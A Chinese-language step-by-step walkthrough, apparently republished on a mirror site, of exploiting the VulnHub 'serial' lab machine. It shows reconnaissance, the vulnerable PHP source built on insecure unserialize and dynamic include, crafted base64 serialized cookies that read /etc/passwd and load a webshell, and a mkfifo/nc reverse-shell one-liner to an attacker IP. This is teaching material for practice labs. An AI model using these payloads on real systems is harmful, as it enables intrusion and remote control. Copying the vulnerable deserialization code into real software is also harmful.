当前位置: 首页 > news >正文

反序列化靶机实战serial(保姆级教程)

一.信息收集

靶机地址下载:https://download.vulnhub.com/serial/serial.zip

打开靶机,在kali虚拟机中进行主机存活探测

可以知道靶机ip地址为192.168.133.171

然后扫描端口 可以发现有一个22端口跟80端口

然后接下来用kali扫描它的目录 

可以发现有一个可访问的目录 我们去访问一下

访问之后backup目录下有一个bak.zip 下载下来

下载下来之后有三个文件  分析一下

index.php

<?php
    include("user.class.php");

    if(!isset($_COOKIE['user'])) {
        setcookie("user", base64_encode(serialize(new User('sk4'))));
    } else {
        unserialize(base64_decode($_COOKIE['user']));
    }
    echo "This is a beta test for new cookie handler\n";
?>

log.class.php

<?php
  class Log {
    private $type_log;

    function __costruct($hnd) {
      $this->$type_log = $hnd;
    }

    public function handler($val) {
      include($this->type_log);
      echo "LOG: " . $val;
    }
  }
?>

user.class.php

<?php
  include("log.class.php");

  class Welcome {
    public function handler($val) {
      echo "Hello " . $val;
    }
  }

  class User {
    private $name;
    private $wel;

    function __construct($name) {
      $this->name = $name;
      $this->wel = new Welcome();
    }

    function __destruct() {
      //echo "bye\n";
      $this->wel->handler($this->name);
    }
  }

?>

 提示cookie,burpsuite抓包看一下cookie

cookie那里有一串base64加密的 解密一下

base64解码得到序列化后字段是

O:4:"User":2:{s:10:"Username";s:3:"sk4";s:9:"Userwel";O:7:"Welcome":0:{}}

 然后我们构造payload 读取/etc/passwd文件

O:4:"User":2:{s:10:"\x00User\x00name";s:5:"admin";s:9:"\x00User\x00wel";O:3:"Log":1:{s:8:"type_log";s:11:"/etc/passwd";}}')

base64编码

Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjM6InNrNCI7czo5OiIAVXNlcgB3ZWwiO086MzoiTG9nIjoxOntzOjg6InR5cGVfbG9nIjtzOjExOiIvZXRjL3Bhc3N3ZCI7fX0=

 然后再次抓包 打开用burp的repeater

将加密后的替换一下 就可以看到  然后成功包含  看到有一个sk4用户可登陆

get shell

构造序列化语句上传shell

生成一个shell放在本地网站下

然后构造payload,尝试读取passwd文件,payload如下 新创建一个1.php在本地的www下 然后 把type_log参数后面记得改成自己上传到本地的一句话木马

<?phpclass Log {private $type_log = "/etc/passwd";}class User {private $name = "admin";private $wel;function __construct() {$this->wel = new Log();}
}
$obj = new User();
echo base64_encode(serialize($obj));

然后去访问自己新创建的php 我这里用的是7.php 打开就看到他的base64编码

然后去抓包 把访问7.php得到的base64编码 替换cookie

成功执行

开始反弹shell

rm+/tmp/f;mkfifo+/tmp/f;cat+/tmp/f|/bin/sh+-i+2>&1|nc+1192.168.133.163+6666+>/tmp/f

将上述代码url编码后填入参数位置

然后在kali里开启监听监听成功 

在攻击模块发送 成功获取shell

查看文件,多返回几次上级目录,找到一个txt文件

查看文件得到他的账号跟密码

最后在远程连接 成功进入

http://www.lryc.cn/news/412095.html

相关文章:

  • 【Git】git 从入门到实战系列(一)—— Git 的诞生,Linus 如何在 14 天内编写出 Git?
  • com.microsoft.sqlserve r:sqljdbc4:jar:4.0 was not found in......如何解决?
  • 数据集——鸢尾花介绍和使用
  • ElasticSearch第4篇(亿级中文数据量 ElasticSearch与Sphinx建索引速度、查询速度、并发性能、实测对比)
  • 过期知识:thinkphp5 使用migrate给现有的数据表新增表字段
  • 前端和Postman调用同一个接口,拿到的数据不一样
  • 1000W长连接,如何建立和维护?千万用户IM 架构设计
  • vulhub:Apache解析漏洞CVE-2017-15715
  • 开发中可能会面临的真实问题及处理流程
  • 个性化你的生产力工具:待办事项App定制指南
  • 本地部署持续集成工具Jenkins并配置公网地址实现远程自动化构建
  • 【数据结构】了解哈希表,解决哈希冲突,用Java模拟实现哈希桶
  • qt5 ui转python或C++文件
  • scp命令详解
  • 算法小白的进阶之路(力扣1~5)
  • 昇思25天学习打卡营第22天|MindSporeK基于Diffusion扩散模型学习- Diffusion与其他生成模型
  • 【C++版本】protobuf与gRPC
  • 要抓住国际白银现货行情 以下这几点需要注意
  • 【计算机毕业设计】​720图书馆智能选座系统
  • java面向对象重点总结
  • 1321:【例6.3】删数问题(Noip1994)
  • 使用 Python 中的 ELSER 进行Serverless 语义搜索:探索夏季奥运会历史
  • [HITCON 2017]SSRFme 1
  • 看不见的硝烟:中国网络安全三十年沉浮史
  • 3.7.物体检测算法
  • Spring源码解析(27)之AOP的核心对象创建过程2
  • 【题解】【数学】—— [CSP-J 2023] 小苹果
  • python实现微信聊天图片DAT文件还原
  • 栈与队列——1.有效的括号
  • C语言家教记录(二)